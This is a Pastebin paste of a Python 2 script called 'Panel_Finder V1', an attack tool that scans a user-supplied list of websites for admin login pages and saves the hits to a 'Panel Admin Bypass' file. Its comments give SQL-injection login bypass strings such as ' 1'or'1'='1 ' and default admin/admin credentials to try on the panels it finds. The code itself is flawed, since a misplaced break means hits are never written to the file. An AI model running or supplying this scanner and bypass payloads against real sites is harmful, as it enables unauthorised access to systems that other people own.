Advertisement
Guest User

trojan kill3r amazigh

a guest
Mar 25th, 2018
199
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.21 KB | None | 0 0
  1. import httplib
  2. from platform import system
  3. import os
  4. import sys, time
  5. ######### help ###########
  6. ########################################################################################################################
  7. # Script Get AdMIN Panel with List #
  8. # Test : User : ('=''or') and Pass : ('=''or') or User : (admin) and Pass : (admin) or Use (Noredirect) #
  9. ########################################################################################################################
  10.  
  11. def clearscrn():
  12. if system() == 'Linux':
  13. os.system('clear')
  14. if system() == 'Windows':
  15. os.system('cls')
  16. os.system('color a')
  17.  
  18. def slowprint(s):
  19. for c in s + '\n':
  20. sys.stdout.write(c)
  21. sys.stdout.flush()
  22. time.sleep(4. / 100)
  23.  
  24. def logo():
  25. print("""\033[95m
  26. _ _ _ _ _ _ _____
  27. __ _ _ __ ___ __ _ ___(_) __ _| |__ | | _(_) | |___ / _ __
  28. / _` | '_ ` _ \ / _` |_ / |/ _` | '_ \ | |/ / | | | |_ \| '__| \033[91m
  29. | (_| | | | | | | (_| |/ /| | (_| | | | | | <| | | |___) | | \033[90m
  30. \__,_|_| |_| |_|\__,_/___|_|\__, |_| |_| |_|\_\_|_|_|____/|_|
  31. |___/
  32.  
  33. Script Name : Panel_Finder V1
  34. Developed By : Trojan Kill3r Amazigh / Aziz Messaoudi
  35. """)
  36. exploit = ["/admin/login.php","/admin/panel.php","/admin/","/admin.html","/admin.php","/admin-login.php","/admin/sifre.php"]
  37. #1'or'1'='1 = sifre
  38. def test():
  39. clearscrn()
  40. logo()
  41. slowprint("\n\t\t\t\t\tCoded By " + "\033[95m ./Trojan Kill3r Amazigh" + "\n\t\t\t\t\t\t \033[92m Facebook: fb.com/amazigh.kil3r")
  42. try:
  43. q = raw_input('\033[96m Entre Liste Site: \033[90m ')
  44. q = open(q, 'r')
  45. except:
  46. print("Entre List Sites -_- #Noob ")
  47.  
  48. for lst in q:
  49. lst = lst.rstrip()
  50. print("\033[94m Wait Scaning ....... \033[94m"), lst
  51. for exploits in exploit:
  52. exploits.rstrip()
  53. try:
  54. if lst[:7] == "http://":
  55. lst = lst.replace("http://","")
  56. if lst[:8] == "https://":
  57. lst = lst.replace("https://", "")
  58. if lst[-1] == "/":
  59. lst = lst.replace("/","")
  60.  
  61. conn = httplib.HTTPConnection(lst)
  62. conn.request("POST", exploits)
  63. conn = conn.getresponse()
  64. htmlconn = conn.read()
  65. if conn.status == 200 and ('type="password"') in htmlconn:
  66. print("\033[92m [+] Admin Panel [+] ======\033[96m=======> \033[96m ") , lst + exploits
  67. break
  68. with open("Panel Admin Bypass.txt", "a") as by:
  69. by.writelines(lst + exploits + "\n")
  70. else:
  71. print("\033[91m [-] Not Found : [-]"),lst + exploits
  72. except:
  73. pass
  74. test()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement